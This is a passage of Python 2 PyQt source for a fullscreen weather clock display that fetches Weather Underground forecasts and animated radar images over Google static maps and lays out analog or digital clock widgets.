                if float(f['qpf_allday']['mm']) > 0.0:
                    s += Config.LRain + str(f['qpf_allday']['mm']) + 'mm '
            s += str(f['high']['celsius']) + '/' + \
                str(f['low']['celsius']) + u'°C'
        else:
            if float(f['snow_allday']['in']) > 0.0:
                s += Config.LSnow + str(f['snow_allday']['in']) + 'in '
            else:
                if float(f['qpf_allday']['in']) > 0.0:
                    s += Config.LRain + str(f['qpf_allday']['in']) + 'in '
            s += str(f['high']['fahrenheit']) + '/' + \
                str(f['low']['fahrenheit']) + u'°F'
        wx2.setText(s)
def getwx():
    """Start the async Weather Underground conditions/forecast request.

    Builds the combined conditions/astronomy/hourly10day/forecast10day
    URL from Config and ApiKeys, then hands the reply to wxfinished().
    """
    global wxurl
    global wxreply
    # Single-argument print() parses identically on Python 2 and 3.
    print("getting current and forecast:" + time.ctime())
    wxurl = Config.wuprefix + ApiKeys.wuapi + \
        '/conditions/astronomy/hourly10day/forecast10day/lang:' + \
        Config.wuLanguage + '/q/'
    wxurl += str(Config.wulocation.lat) + ',' + \
        str(Config.wulocation.lng) + '.json'
    # Cache-buster so intermediaries do not serve a stale response.
    wxurl += '?r=' + str(random.random())
    print(wxurl)
    r = QNetworkRequest(QUrl(wxurl))
    wxreply = manager.get(r)
    wxreply.finished.connect(wxfinished)
def getallwx():
    """Refresh all weather data (currently a single combined WU call)."""
    getwx()
def qtstart():
    """One-shot startup hook, run once the Qt event loop is going.

    Fetches the initial weather/temperature data, starts the radar
    downloads, and creates the recurring clock/weather/temperature timers.
    """
    global ctimer, wxtimer, temptimer
    global manager
    global objradar1
    global objradar2
    global objradar3
    global objradar4
    getallwx()
    gettemp()
    # Radars 1 and 2 live on the visible frame, so their animations are
    # started immediately; 3 and 4 only download here (their wxstart()
    # happens when their frame is flipped to — see fixupframe).
    objradar1.start(Config.radar_refresh * 60)
    objradar1.wxstart()
    objradar2.start(Config.radar_refresh * 60)
    objradar2.wxstart()
    objradar3.start(Config.radar_refresh * 60)
    objradar4.start(Config.radar_refresh * 60)
    # 1 Hz clock tick.
    ctimer = QtCore.QTimer()
    ctimer.timeout.connect(tick)
    ctimer.start(1000)
    # Weather refresh, jittered 1-10 s so several clocks don't sync up.
    wxtimer = QtCore.QTimer()
    wxtimer.timeout.connect(getallwx)
    wxtimer.start(1000 * Config.weather_refresh *
                  60 + random.uniform(1000, 10000))
    # Indoor temperature every 10 minutes, also jittered.
    temptimer = QtCore.QTimer()
    temptimer.timeout.connect(gettemp)
    temptimer.start(1000 * 10 * 60 + random.uniform(1000, 10000))
class Radar(QtGui.QLabel):
    """Map pane overlaying an animated WU radar/satellite GIF on a static
    Google Maps base image, with a markers-only overlay on top, refreshed
    on a timer.
    """
    def __init__(self, parent, radar, rect, myname):
        """Build the widget tree and the three URLs (base map, markers
        overlay, radar animation) for the given map spec and screen rect.
        """
        global xscale, yscale
        self.myname = myname
        self.rect = rect
        # Per-radar satellite override; falls back to the global setting.
        self.satellite = Config.satellite
        try:
            if radar["satellite"]:
                self.satellite = 1
        except KeyError:
            pass
        self.baseurl = self.mapurl(radar, rect, False)
        print "google map base url: " + self.baseurl
        self.mkurl = self.mapurl(radar, rect, True)
        self.wxurl = self.radarurl(radar, rect)
        print "radar url: " + self.wxurl
        QtGui.QLabel.__init__(self, parent)
        self.interval = Config.radar_refresh * 60
        self.lastwx = 0         # epoch of last good animation (0 = stale)
        self.retries = 0        # consecutive failed-GIF retry count
        self.setObjectName("radar")
        self.setGeometry(rect)
        self.setStyleSheet("#radar { background-color: grey; }")
        self.setAlignment(Qt.AlignCenter)
        # Child label for the animation (or, in satellite mode, the
        # dimmed base map — see basefinished/wxfinished).
        self.wwx = QtGui.QLabel(self)
        self.wwx.setObjectName("wx")
        self.wwx.setStyleSheet("#wx { background-color: transparent; }")
        self.wwx.setGeometry(0, 0, rect.width(), rect.height())
        # Child label for the markers-only overlay.
        self.wmk = QtGui.QLabel(self)
        self.wmk.setObjectName("mk")
        self.wmk.setStyleSheet("#mk { background-color: transparent; }")
        self.wmk.setGeometry(0, 0, rect.width(), rect.height())
        self.wxmovie = QMovie()
    def mapurl(self, radar, rect, markersonly):
        """Build a Google static-map URL for this pane; with
        markersonly=True the map tiles are hidden so only the markers
        render (used as a transparent overlay).
        """
        # 'https://maps.googleapis.com/maps/api/staticmap?maptype=hybrid&center='+rcenter.lat+','+rcenter.lng+'&zoom='+rzoom+'&size=300x275'+markersr;
        urlp = []
        if len(ApiKeys.googleapi) > 0:
            urlp.append('key=' + ApiKeys.googleapi)
        urlp.append(
            'center=' + str(radar['center'].lat) +
            ',' + str(radar['center'].lng))
        zoom = radar['zoom']
        rsize = rect.size()
        # Static-map API caps at 640x640: request half size one zoom
        # level out and let Qt scale it up on display.
        if rsize.width() > 640 or rsize.height() > 640:
            rsize = QtCore.QSize(rsize.width() / 2, rsize.height() / 2)
            zoom -= 1
        urlp.append('zoom=' + str(zoom))
        urlp.append('size=' + str(rsize.width()) + 'x' + str(rsize.height()))
        if markersonly:
            urlp.append('style=visibility:off')
        else:
            urlp.append('maptype=hybrid')
        for marker in radar['markers']:
            marks = []
            for opts in marker:
                if opts != 'location':
                    marks.append(opts + ':' + marker[opts])
            marks.append(str(marker['location'].lat) +
                         ',' + str(marker['location'].lng))
            urlp.append('markers=' + '|'.join(marks))
        return 'http://maps.googleapis.com/maps/api/staticmap?' + \
            '&'.join(urlp)
    def radarurl(self, radar, rect):
        """Build the WU animated radar (or satellite) GIF URL covering
        the same bounding box as the base map.
        """
        # wuprefix = 'http://api.wunderground.com/api/';
        # wuprefix+wuapi+'/animatedradar/image.gif?maxlat='+rNE.lat+'&maxlon='+
        # rNE.lng+'&minlat='+rSW.lat+'&minlon='+rSW.lng+wuoptionsr;
        # wuoptionsr = '&width=300&height=275&newmaps=0&reproj.automerc=1&num=5
        # &delay=25&timelabel=1&timelabel.y=10&rainsnow=1&smooth=1';
        rr = getCorners(radar['center'], radar['zoom'],
                        rect.width(), rect.height())
        if self.satellite:
            return (Config.wuprefix + ApiKeys.wuapi +
                    '/animatedsatellite/lang:' +
                    Config.wuLanguage +
                    '/image.gif' +
                    '?maxlat=' + str(rr['N']) +
                    '&maxlon=' + str(rr['E']) +
                    '&minlat=' + str(rr['S']) +
                    '&minlon=' + str(rr['W']) +
                    '&width=' + str(rect.width()) +
                    '&height=' + str(rect.height()) +
                    '&newmaps=0&reproj.automerc=1&num=5&delay=25' +
                    '&timelabel=1&timelabel.y=10&smooth=1&key=sat_ir4_bottom'
                    )
        else:
            return (Config.wuprefix +
                    ApiKeys.wuapi +
                    '/animatedradar/lang:' +
                    Config.wuLanguage + '/image.gif' +
                    '?maxlat=' + str(rr['N']) +
                    '&maxlon=' + str(rr['E']) +
                    '&minlat=' + str(rr['S']) +
                    '&minlon=' + str(rr['W']) +
                    '&width=' + str(rect.width()) +
                    '&height=' + str(rect.height()) +
                    '&newmaps=0&reproj.automerc=1&num=5&delay=25' +
                    '&timelabel=1&timelabel.y=10&rainsnow=1&smooth=1' +
                    '&radar_bitmap=1&xnoclutter=1&xnoclutter_mask=1&cors=1'
                    )
    def basefinished(self):
        """Receive the base map image; scale it and install it."""
        if self.basereply.error() != QNetworkReply.NoError:
            return
        self.basepixmap = QPixmap()
        self.basepixmap.loadFromData(self.basereply.readAll())
        if self.basepixmap.size() != self.rect.size():
            self.basepixmap = self.basepixmap.scaled(self.rect.size(),
                                                     Qt.KeepAspectRatio,
                                                     Qt.SmoothTransformation)
        if self.satellite:
            # Satellite mode: repaint the base map at 60% opacity onto
            # the overlay label so the animation below shows through.
            p = QPixmap(self.basepixmap.size())
            p.fill(Qt.transparent)
            painter = QPainter()
            painter.begin(p)
            painter.setOpacity(0.6)
            painter.drawPixmap(0, 0, self.basepixmap)
            painter.end()
            self.basepixmap = p
            self.wwx.setPixmap(self.basepixmap)
        else:
            self.setPixmap(self.basepixmap)
    def mkfinished(self):
        """Receive the markers overlay; scale, dim, and install it."""
        if self.mkreply.error() != QNetworkReply.NoError:
            return
        self.mkpixmap = QPixmap()
        self.mkpixmap.loadFromData(self.mkreply.readAll())
        if self.mkpixmap.size() != self.rect.size():
            self.mkpixmap = self.mkpixmap.scaled(
                self.rect.size(),
                Qt.KeepAspectRatio,
                Qt.SmoothTransformation)
        # Wash the overlay with the configured dim color.
        br = QBrush(QColor(Config.dimcolor))
        painter = QPainter()
        painter.begin(self.mkpixmap)
        painter.fillRect(0, 0, self.mkpixmap.width(),
                         self.mkpixmap.height(), br)
        painter.end()
        self.wmk.setPixmap(self.mkpixmap)
    def wxfinished(self):
        """Receive the animated radar GIF and start it playing.

        A reply with 2 or fewer frames is treated as a failed fetch and
        retried up to 3 times, 5 seconds apart.
        """
        if self.wxreply.error() != QNetworkReply.NoError:
            print "get radar error " + self.myname + ":" + \
                str(self.wxreply.error())
            self.lastwx = 0
            return
        print "radar map received:" + self.myname + ":" + time.ctime()
        self.wxmovie.stop()
        # Keep the data and buffer alive on self: QMovie reads lazily.
        self.wxdata = QtCore.QByteArray(self.wxreply.readAll())
        self.wxbuff = QtCore.QBuffer(self.wxdata)
        self.wxbuff.open(QtCore.QIODevice.ReadOnly)
        mov = QMovie(self.wxbuff, 'GIF')
        print "radar map frame count:" + self.myname + ":" + \
            str(mov.frameCount()) + ":r" + str(self.retries)
        if mov.frameCount() > 2:
            self.lastwx = time.time()
            self.retries = 0
        else:
            # radar image retrieval failed
            if self.retries > 3:
                # give up, last successful animation stays.
                # the next normal radar_refresh time (default 10min) will apply
                self.lastwx = time.time()
                return
            self.lastwx = 0
            # count retries
            self.retries = self.retries + 1
            # retry in 5 seconds
            QtCore.QTimer.singleShot(5 * 1000, self.getwx)
            return
        self.wxmovie = mov
        if self.satellite:
            self.setMovie(self.wxmovie)
        else:
            self.wwx.setMovie(self.wxmovie)
        if self.parent().isVisible():
            self.wxmovie.start()
    def getwx(self):
        """Schedule the radar fetch, keeping API calls >= 2 s apart."""
        global lastapiget
        i = 0.1
        # making sure there is at least 2 seconds between radar api calls
        lastapiget += 2
        if time.time() > lastapiget:
            lastapiget = time.time()
        else:
            i = lastapiget - time.time()
        print "get radar api call spacing oneshot get i=" + str(i)
        QtCore.QTimer.singleShot(i * 1000, self.getwx2)
    def getwx2(self):
        """Issue the radar HTTP request (skipped if one is in flight)."""
        global manager
        try:
            if self.wxreply.isRunning():
                return
        except Exception:
            # self.wxreply does not exist before the first request.
            pass
        print "getting radar map " + self.myname + ":" + time.ctime()
        self.wxreq = QNetworkRequest(
            QUrl(self.wxurl + '&rrrand=' + str(time.time())))
        self.wxreply = manager.get(self.wxreq)
        QtCore.QObject.connect(self.wxreply, QtCore.SIGNAL(
            "finished()"), self.wxfinished)
    def getbase(self):
        """Request the static base map."""
        global manager
        self.basereq = QNetworkRequest(QUrl(self.baseurl))
        self.basereply = manager.get(self.basereq)
        QtCore.QObject.connect(self.basereply, QtCore.SIGNAL(
            "finished()"), self.basefinished)
    def getmk(self):
        """Request the markers-only overlay map."""
        global manager
        self.mkreq = QNetworkRequest(QUrl(self.mkurl))
        self.mkreply = manager.get(self.mkreq)
        QtCore.QObject.connect(self.mkreply, QtCore.SIGNAL(
            "finished()"), self.mkfinished)
    def start(self, interval=0):
        """Fetch the static layers and create (but not start) the refresh
        timer.  ``interval`` is in seconds; 0 keeps the current value.
        """
        if interval > 0:
            self.interval = interval
        self.getbase()
        self.getmk()
        self.timer = QtCore.QTimer()
        QtCore.QObject.connect(
            self.timer, QtCore.SIGNAL("timeout()"), self.getwx)
    def wxstart(self):
        """Begin (or resume) animating: fetch if stale, start the timer."""
        print "wxstart for " + self.myname
        if (self.lastwx == 0 or (self.lastwx + self.interval) < time.time()):
            self.getwx()
        # random 1 to 10 seconds added to refresh interval to spread the
        # queries over time
        i = (self.interval + random.uniform(1, 10)) * 1000
        self.timer.start(i)
        self.wxmovie.start()
        QtCore.QTimer.singleShot(1000, self.wxmovie.start)
    def wxstop(self):
        """Pause refreshing and animation (frame hidden)."""
        print "wxstop for " + self.myname
        self.timer.stop()
        self.wxmovie.stop()
    def stop(self):
        """Shut down the timer and animation for program exit."""
        try:
            self.timer.stop()
            self.timer = None
            if self.wxmovie:
                self.wxmovie.stop()
        except Exception:
            pass
def realquit():
    """Final stage of shutdown: stop the Qt event loop."""
    QtGui.QApplication.exit(0)
def myquit(a=0, b=0):
    """Stop the radars and timers, then exit shortly afterwards.

    The (a, b) parameters match the (signum, frame) signature of a
    signal handler, so this is usable both via signal.signal() and as a
    direct call; both are ignored.
    """
    global objradar1, objradar2, objradar3, objradar4
    # BUGFIX: this list previously declared 'wtimer' (a typo) — the
    # timer actually stopped below is 'wxtimer'.
    global ctimer, wxtimer, temptimer
    objradar1.stop()
    objradar2.stop()
    objradar3.stop()
    objradar4.stop()
    ctimer.stop()
    wxtimer.stop()
    temptimer.stop()
    # Give pending Qt events a moment to drain before exiting.
    QtCore.QTimer.singleShot(30, realquit)
def fixupframe(frame, onoff):
    """Start (onoff=True) or stop the radar animations on every Radar
    child widget of *frame*.
    """
    radars = [child for child in frame.children()
              if isinstance(child, Radar)]
    for radar in radars:
        if onoff:
            radar.wxstart()
        else:
            radar.wxstop()
def nextframe(plusminus):
    """Hide the current frame and show an adjacent one, wrapping at
    either end of the frame list.  *plusminus* is +1 or -1.
    """
    global frames, framep
    leaving = frames[framep]
    leaving.setVisible(False)
    fixupframe(leaving, False)
    framep += plusminus
    # Wrap around past either end of the list.
    if framep >= len(frames):
        framep = 0
    elif framep < 0:
        framep = len(frames) - 1
    entering = frames[framep]
    entering.setVisible(True)
    fixupframe(entering, True)
class myMain(QtGui.QWidget):
    """Top-level widget: keyboard/mouse handling for the kiosk display."""
    def keyPressEvent(self, event):
        """F4 quits, F2 toggles the NOAA audio stream, and space/arrow
        keys flip between the display frames.
        """
        global weatherplayer, lastkeytime
        if isinstance(event, QtGui.QKeyEvent):
            # print event.key(), format(event.key(), '08x')
            if event.key() == Qt.Key_F4:
                myquit()
            if event.key() == Qt.Key_F2:
                # Debounced: repeats within 2 seconds are ignored.
                if time.time() > lastkeytime:
                    if weatherplayer is None:
                        weatherplayer = Popen(
                            ["mpg123", "-q", Config.noaastream])
                    else:
                        weatherplayer.kill()
                        weatherplayer = None
                    lastkeytime = time.time() + 2
            if event.key() == Qt.Key_Space:
                nextframe(1)
            if event.key() == Qt.Key_Left:
                nextframe(-1)
            if event.key() == Qt.Key_Right:
                nextframe(1)
    def mousePressEvent(self, event):
        """Any click or touch advances to the next frame."""
        if type(event) == QtGui.QMouseEvent:
            nextframe(1)
# The configuration is a plain Python module named on the command line
# (default 'Config'); refuse to start without it.
configname = 'Config'
if len(sys.argv) > 1:
    configname = sys.argv[1]
if not os.path.isfile(configname + ".py"):
    # Same message as before; print() with one argument is valid on
    # both Python 2 and 3.
    print("Config file not found %s.py" % configname)
    exit(1)
Config = __import__(configname)
# define default values for new/optional config variables.
try:
    Config.metric
except AttributeError:
    Config.metric = 0
try:
    Config.weather_refresh
except AttributeError:
    Config.weather_refresh = 30  # minutes
try:
    Config.radar_refresh
except AttributeError:
    Config.radar_refresh = 10  # minutes
try:
    Config.fontattr
except AttributeError:
    Config.fontattr = ''
try:
    Config.dimcolor
except AttributeError:
    # Fully transparent black: no dimming by default.
    Config.dimcolor = QColor('#000000')
    Config.dimcolor.setAlpha(0)
try:
    Config.DateLocale
except AttributeError:
    Config.DateLocale = ''
try:
    Config.wind_degrees
except AttributeError:
    Config.wind_degrees = 0
try:
    Config.satellite
except AttributeError:
    Config.satellite = 0
try:
    Config.digital
except AttributeError:
    Config.digital = 0
# BUGFIX: wuLanguage gets its own default instead of piggybacking on the
# LPressure check below, which used to overwrite a user-supplied
# wuLanguage whenever the label strings were left at their defaults.
try:
    Config.wuLanguage
except AttributeError:
    Config.wuLanguage = "EN"
# English label strings, overridable as a set for localization.
try:
    Config.LPressure
except AttributeError:
    Config.LPressure = "Pressure "
    Config.LHumidity = "Humidity "
    Config.LWind = "Wind "
    Config.Lgusting = " gusting "
    Config.LFeelslike = "Feels like "
    Config.LPrecip1hr = " Precip 1hr:"
    Config.LToday = "Today: "
    Config.LSunRise = "Sun Rise:"
    Config.LSet = " Set: "
    Config.LMoonPhase = " Moon Phase:"
    Config.LInsideTemp = "Inside Temp "
    Config.LRain = " Rain: "
    Config.LSnow = " Snow: "
#
# Runtime state shared by the timer and key handlers above.
lastmin = -1
lastday = -1
pdy = ""
lasttimestr = ""
weatherplayer = None
lastkeytime = 0
lastapiget = time.time()
# Create the application and size everything to the screen.
app = QtGui.QApplication(sys.argv)
desktop = app.desktop()
rec = desktop.screenGeometry()
height = rec.height()
width = rec.width()
signal.signal(signal.SIGINT, myquit)
w = myMain()
w.setWindowTitle(os.path.basename(__file__))
w.setStyleSheet("QWidget { background-color: black;}")
# fullbgpixmap = QtGui.QPixmap(Config.background)
# fullbgrect = fullbgpixmap.rect()
# xscale = float(width)/fullbgpixmap.width()
# yscale = float(height)/fullbgpixmap.height()
# All geometry below is authored for a 1440x900 layout and scaled.
xscale = float(width) / 1440.0
yscale = float(height) / 900.0
# Two full-screen frames; space/arrow keys and clicks flip between them.
frames = []
framep = 0
frame1 = QtGui.QFrame(w)
frame1.setObjectName("frame1")
frame1.setGeometry(0, 0, width, height)
frame1.setStyleSheet("#frame1 { background-color: black; border-image: url(" +
                     Config.background + ") 0 0 0 0 stretch stretch;}")
frames.append(frame1)
frame2 = QtGui.QFrame(w)
frame2.setObjectName("frame2")
frame2.setGeometry(0, 0, width, height)
frame2.setStyleSheet("#frame2 { background-color: blue; border-image: url(" +
                     Config.background + ") 0 0 0 0 stretch stretch;}")
frame2.setVisible(False)
frames.append(frame2)
# frame3 = QtGui.QFrame(w)
# frame3.setObjectName("frame3")
# frame3.setGeometry(0,0,width,height)
# frame3.setStyleSheet("#frame3 { background-color: blue; border-image:
# url("+Config.background+") 0 0 0 0 stretch stretch;}")
# frame3.setVisible(False)
# frames.append(frame3)
# Decorative corner art on frame 1.
squares1 = QtGui.QFrame(frame1)
squares1.setObjectName("squares1")
squares1.setGeometry(0, height - yscale * 600, xscale * 340, yscale * 600)
squares1.setStyleSheet(
    "#squares1 { background-color: transparent; border-image: url(" +
    Config.squares1 +
    ") 0 0 0 0 stretch stretch;}")
squares2 = QtGui.QFrame(frame1)
squares2.setObjectName("squares2")
squares2.setGeometry(width - xscale * 340, 0, xscale * 340, yscale * 900)
squares2.setStyleSheet(
    "#squares2 { background-color: transparent; border-image: url(" +
    Config.squares2 +
    ") 0 0 0 0 stretch stretch;}")
# Build either the analog clock (image face plus hand pixmaps, rotated
# each tick) or the digital clock label, depending on Config.digital.
if not Config.digital:
    clockface = QtGui.QFrame(frame1)
    clockface.setObjectName("clockface")
    clockrect = QtCore.QRect(
        width / 2 - height * .4,
        height * .45 - height * .4,
        height * .8,
        height * .8)
    clockface.setGeometry(clockrect)
    clockface.setStyleSheet(
        "#clockface { background-color: transparent; border-image: url(" +
        Config.clockface +
        ") 0 0 0 0 stretch stretch;}")
    hourhand = QtGui.QLabel(frame1)
    hourhand.setObjectName("hourhand")
    hourhand.setStyleSheet("#hourhand { background-color: transparent; }")
    minhand = QtGui.QLabel(frame1)
    minhand.setObjectName("minhand")
    minhand.setStyleSheet("#minhand { background-color: transparent; }")
    sechand = QtGui.QLabel(frame1)
    sechand.setObjectName("sechand")
    sechand.setStyleSheet("#sechand { background-color: transparent; }")
    # The *2 pixmaps hold the rotated copies generated by tick().
    hourpixmap = QtGui.QPixmap(Config.hourhand)
    hourpixmap2 = QtGui.QPixmap(Config.hourhand)
    minpixmap = QtGui.QPixmap(Config.minhand)
    minpixmap2 = QtGui.QPixmap(Config.minhand)
    secpixmap = QtGui.QPixmap(Config.sechand)
    secpixmap2 = QtGui.QPixmap(Config.sechand)
else:
    clockface = QtGui.QLabel(frame1)
    clockface.setObjectName("clockface")
    clockrect = QtCore.QRect(
        width / 2 - height * .4,
        height * .45 - height * .4,
        height * .8,
        height * .8)
    clockface.setGeometry(clockrect)
    dcolor = QColor(Config.digitalcolor).darker(0).name()
    lcolor = QColor(Config.digitalcolor).lighter(120).name()
    clockface.setStyleSheet(
        "#clockface { background-color: transparent; font-family:sans-serif;" +
        " font-weight: light; color: " +
        lcolor +
        "; background-color: transparent; font-size: " +
        str(int(Config.digitalsize * xscale)) +
        "px; " +
        Config.fontattr +
        "}")
    clockface.setAlignment(Qt.AlignCenter)
    clockface.setGeometry(clockrect)
    # Soft glow effect behind the digital digits.
    glow = QtGui.QGraphicsDropShadowEffect()
    glow.setOffset(0)
    glow.setBlurRadius(50)
    glow.setColor(QColor(dcolor))
    clockface.setGraphicsEffect(glow)
# Four radar panes: two small ones on frame 1, two large on frame 2.
radar1rect = QtCore.QRect(3 * xscale, 344 * yscale, 300 * xscale, 275 * yscale)
objradar1 = Radar(frame1, Config.radar1, radar1rect, "radar1")
radar2rect = QtCore.QRect(3 * xscale, 622 * yscale, 300 * xscale, 275 * yscale)
objradar2 = Radar(frame1, Config.radar2, radar2rect, "radar2")
radar3rect = QtCore.QRect(13 * xscale, 50 * yscale, 700 * xscale, 700 * yscale)
objradar3 = Radar(frame2, Config.radar3, radar3rect, "radar3")
radar4rect = QtCore.QRect(726 * xscale, 50 * yscale,
                          700 * xscale, 700 * yscale)
objradar4 = Radar(frame2, Config.radar4, radar4rect, "radar4")
# Date banner on frame 1; date and digital-time labels on frame 2.
datex = QtGui.QLabel(frame1)
datex.setObjectName("datex")
datex.setStyleSheet("#datex { font-family:sans-serif; color: " +
                    Config.textcolor +
                    "; background-color: transparent; font-size: " +
                    str(int(50 * xscale)) +
                    "px; " +
                    Config.fontattr +
                    "}")
datex.setAlignment(Qt.AlignHCenter | Qt.AlignTop)
datex.setGeometry(0, 0, width, 100)
datex2 = QtGui.QLabel(frame2)
datex2.setObjectName("datex2")
datex2.setStyleSheet("#datex2 { font-family:sans-serif; color: " +
                     Config.textcolor +
                     "; background-color: transparent; font-size: " +
                     str(int(50 * xscale)) + "px; " +
                     Config.fontattr +
                     "}")
datex2.setAlignment(Qt.AlignHCenter | Qt.AlignTop)
datex2.setGeometry(800 * xscale, 780 * yscale, 640 * xscale, 100)
datey2 = QtGui.QLabel(frame2)
datey2.setObjectName("datey2")
datey2.setStyleSheet("#datey2 { font-family:sans-serif; color: " +
                     Config.textcolor +
                     "; background-color: transparent; font-size: " +
                     str(int(50 * xscale)) +
                     "px; " +
                     Config.fontattr +
                     "}")
datey2.setAlignment(Qt.AlignHCenter | Qt.AlignTop)
datey2.setGeometry(800 * xscale, 840 * yscale, 640 * xscale, 100)
# Current-conditions column on frame 1 (plus the frame 2 equivalents):
# icon, description, temperature, pressure, humidity, wind, feels-like
# and observation-time labels.  ypos walks down the column in the
# 900-px design units that yscale maps to the real screen.
ypos = -25
wxicon = QtGui.QLabel(frame1)
wxicon.setObjectName("wxicon")
wxicon.setStyleSheet("#wxicon { background-color: transparent; }")
wxicon.setGeometry(75 * xscale, ypos * yscale, 150 * xscale, 150 * yscale)
wxicon2 = QtGui.QLabel(frame2)
wxicon2.setObjectName("wxicon2")
wxicon2.setStyleSheet("#wxicon2 { background-color: transparent; }")
wxicon2.setGeometry(0 * xscale, 750 * yscale, 150 * xscale, 150 * yscale)
ypos += 130
wxdesc = QtGui.QLabel(frame1)
wxdesc.setObjectName("wxdesc")
wxdesc.setStyleSheet("#wxdesc { background-color: transparent; color: " +
                     Config.textcolor +
                     "; font-size: " +
                     str(int(30 * xscale)) +
                     "px; " +
                     Config.fontattr +
                     "}")
wxdesc.setAlignment(Qt.AlignHCenter | Qt.AlignTop)
wxdesc.setGeometry(3 * xscale, ypos * yscale, 300 * xscale, 100)
wxdesc2 = QtGui.QLabel(frame2)
wxdesc2.setObjectName("wxdesc2")
wxdesc2.setStyleSheet("#wxdesc2 { background-color: transparent; color: " +
                      Config.textcolor +
                      "; font-size: " +
                      str(int(50 * xscale)) +
                      "px; " +
                      Config.fontattr +
                      "}")
wxdesc2.setAlignment(Qt.AlignLeft | Qt.AlignTop)
wxdesc2.setGeometry(400 * xscale, 800 * yscale, 400 * xscale, 100)
ypos += 25
temper = QtGui.QLabel(frame1)
temper.setObjectName("temper")
temper.setStyleSheet("#temper { background-color: transparent; color: " +
                     Config.textcolor +
                     "; font-size: " +
                     str(int(70 * xscale)) +
                     "px; " +
                     Config.fontattr +
                     "}")
temper.setAlignment(Qt.AlignHCenter | Qt.AlignTop)
temper.setGeometry(3 * xscale, ypos * yscale, 300 * xscale, 100)
temper2 = QtGui.QLabel(frame2)
temper2.setObjectName("temper2")
temper2.setStyleSheet("#temper2 { background-color: transparent; color: " +
                      Config.textcolor +
                      "; font-size: " +
                      str(int(70 * xscale)) +
                      "px; " +
                      Config.fontattr +
                      "}")
temper2.setAlignment(Qt.AlignHCenter | Qt.AlignTop)
temper2.setGeometry(125 * xscale, 780 * yscale, 300 * xscale, 100)
ypos += 80
press = QtGui.QLabel(frame1)
press.setObjectName("press")
press.setStyleSheet("#press { background-color: transparent; color: " +
                    Config.textcolor +
                    "; font-size: " +
                    str(int(25 * xscale)) +
                    "px; " +
                    Config.fontattr +
                    "}")
press.setAlignment(Qt.AlignHCenter | Qt.AlignTop)
press.setGeometry(3 * xscale, ypos * yscale, 300 * xscale, 100)
ypos += 30
humidity = QtGui.QLabel(frame1)
humidity.setObjectName("humidity")
humidity.setStyleSheet("#humidity { background-color: transparent; color: " +
                       Config.textcolor +
                       "; font-size: " +
                       str(int(25 * xscale)) +
                       "px; " +
                       Config.fontattr +
                       "}")
humidity.setAlignment(Qt.AlignHCenter | Qt.AlignTop)
humidity.setGeometry(3 * xscale, ypos * yscale, 300 * xscale, 100)
ypos += 30
wind = QtGui.QLabel(frame1)
wind.setObjectName("wind")
wind.setStyleSheet("#wind { background-color: transparent; color: " +
                   Config.textcolor +
                   "; font-size: " +
                   str(int(20 * xscale)) +
                   "px; " +
                   Config.fontattr +
                   "}")
wind.setAlignment(Qt.AlignHCenter | Qt.AlignTop)
wind.setGeometry(3 * xscale, ypos * yscale, 300 * xscale, 100)
ypos += 20
wind2 = QtGui.QLabel(frame1)
wind2.setObjectName("wind2")
wind2.setStyleSheet("#wind2 { background-color: transparent; color: " +
                    Config.textcolor +
                    "; font-size: " +
                    str(int(20 * xscale)) +
                    "px; " +
                    Config.fontattr +
                    "}")
wind2.setAlignment(Qt.AlignHCenter | Qt.AlignTop)
wind2.setGeometry(3 * xscale, ypos * yscale, 300 * xscale, 100)
ypos += 20
wdate = QtGui.QLabel(frame1)
wdate.setObjectName("wdate")
wdate.setStyleSheet("#wdate { background-color: transparent; color: " +
                    Config.textcolor +
                    "; font-size: " +
                    str(int(15 * xscale)) +
                    "px; " +
                    Config.fontattr +
                    "}")
wdate.setAlignment(Qt.AlignHCenter | Qt.AlignTop)
wdate.setGeometry(3 * xscale, ypos * yscale, 300 * xscale, 100)
# Sun/moon summary and indoor temperature lines across the bottom edge.
bottom = QtGui.QLabel(frame1)
bottom.setObjectName("bottom")
bottom.setStyleSheet("#bottom { font-family:sans-serif; color: " +
                     Config.textcolor +
                     "; background-color: transparent; font-size: " +
                     str(int(30 * xscale)) +
                     "px; " +
                     Config.fontattr +
                     "}")
bottom.setAlignment(Qt.AlignHCenter | Qt.AlignTop)
bottom.setGeometry(0, height - 50, width, 50)
temp = QtGui.QLabel(frame1)
temp.setObjectName("temp")
temp.setStyleSheet("#temp { font-family:sans-serif; color: " +
                   Config.textcolor +
                   "; background-color: transparent; font-size: " +
                   str(int(30 * xscale)) +
                   "px; " +
                   Config.fontattr +
                   "}")
temp.setAlignment(Qt.AlignHCenter | Qt.AlignTop)
temp.setGeometry(0, height - 100, width, 50)
# Nine forecast slots down the right edge: slots 0-2 are filled from the
# hourly forecast, 3-8 from the daily forecast (see wxfinished).
forecast = []
for i in range(0, 9):
    lab = QtGui.QLabel(frame1)
    lab.setObjectName("forecast" + str(i))
    lab.setStyleSheet("QWidget { background-color: transparent; color: " +
                      Config.textcolor +
                      "; font-size: " +
                      str(int(20 * xscale)) +
                      "px; " +
                      Config.fontattr +
                      "}")
    lab.setGeometry(1137 * xscale, i * 100 * yscale,
                    300 * xscale, 100 * yscale)
    icon = QtGui.QLabel(lab)
    icon.setStyleSheet("#icon { background-color: transparent; }")
    icon.setGeometry(0, 0, 100 * xscale, 100 * yscale)
    icon.setObjectName("icon")
    wx = QtGui.QLabel(lab)
    wx.setStyleSheet("#wx { background-color: transparent; }")
    wx.setGeometry(100 * xscale, 10 * yscale, 200 * xscale, 20 * yscale)
    wx.setObjectName("wx")
    wx2 = QtGui.QLabel(lab)
    wx2.setStyleSheet("#wx2 { background-color: transparent; }")
    wx2.setGeometry(100 * xscale, 30 * yscale, 200 * xscale, 100 * yscale)
    wx2.setAlignment(Qt.AlignLeft | Qt.AlignTop)
    wx2.setWordWrap(True)
    wx2.setObjectName("wx2")
    day = QtGui.QLabel(lab)
    day.setStyleSheet("#day { background-color: transparent; }")
    day.setGeometry(100 * xscale, 75 * yscale, 200 * xscale, 25 * yscale)
    day.setAlignment(Qt.AlignRight | Qt.AlignBottom)
    day.setObjectName("day")
    forecast.append(lab)
# Shared network-access manager for all HTTP requests.
manager = QtNetwork.QNetworkAccessManager()
# proxy = QNetworkProxy()
# proxy.setType(QNetworkProxy.HttpProxy)
# proxy.setHostName("localhost")
# proxy.setPort(8888)
# QNetworkProxy.setApplicationProxy(proxy)
# Defer data fetching until the event loop is running.
stimer = QtCore.QTimer()
stimer.singleShot(10, qtstart)
# print radarurl(Config.radar1,radar1rect)
w.show()
w.showFullScreen()
sys.exit(app.exec_())
